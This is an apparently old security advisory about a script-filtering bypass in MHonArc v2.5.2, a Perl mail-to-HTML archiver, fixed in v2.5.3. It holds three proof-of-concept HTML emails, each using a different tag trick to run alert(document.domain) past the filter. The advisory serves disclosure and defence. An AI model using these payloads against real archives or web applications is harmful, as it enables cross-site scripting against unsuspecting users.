COMMAND
	MHonArc script filtering bypass vulnerability
SYSTEMS AFFECTED
	MHonArc v2.5.2
PROBLEM
	Hiromitsu Takagi reported following about MHonArc, a  Perl  mail-to-HTML
	converter. MHonArc provides HTML mail archiving with index, mail  thread
	linking, etc; plus other capabilities including  support  for  MIME  and
	powerful user customization features  (accordingly  with  their  website
	[http://www.mhonarc.org/]).
	MHonArc has a feature which filters out  scripting  tags  from  incoming
	HTML mails and it is enabled on default.  However,  some  variations  of
	scripting tags will not be filtered.
	
	Exploit 1:
	----------
	  From: [email protected]
	  To: [email protected]
	  Date: Sun, 16 Dec 2001 00:00:00 +0900
	  Subject: test
	  MIME-Version: 1.0
	  Content-Type: text/html
	  <HTML>
	  <SCR<SCRIPT></SCRIPT>IPT>alert(document.domain)</SCR<SCRIPT></SCRIPT>IPT>
	  </HTML>
	----------
	Exploit 2:
	----------
	  From: [email protected]
	  To: [email protected]
	  Date: Sun, 16 Dec 2001 00:00:00 +0900
	  Subject: test
	  MIME-Version: 1.0
	  Content-Type: text/html
	  <HTML>
	  <IMG SRC=javascript:alert(document.domain)>
	  </HTML>
	----------
	Exploit 3:
	----------
	  From: [email protected]
	  To: [email protected]
	  Date: Sun, 16 Dec 2001 00:00:00 +0900
	  Subject: test
	  MIME-Version: 1.0
	  Content-Type: text/html
	  <HTML>
	  <B foo=&{alert(document.domain)};>
	  Vulnerable only if Netscape 4.x is used to browse.</B>
	  </HTML>
	----------
	
SOLUTION
	Upgrade to MHonArc v2.5.3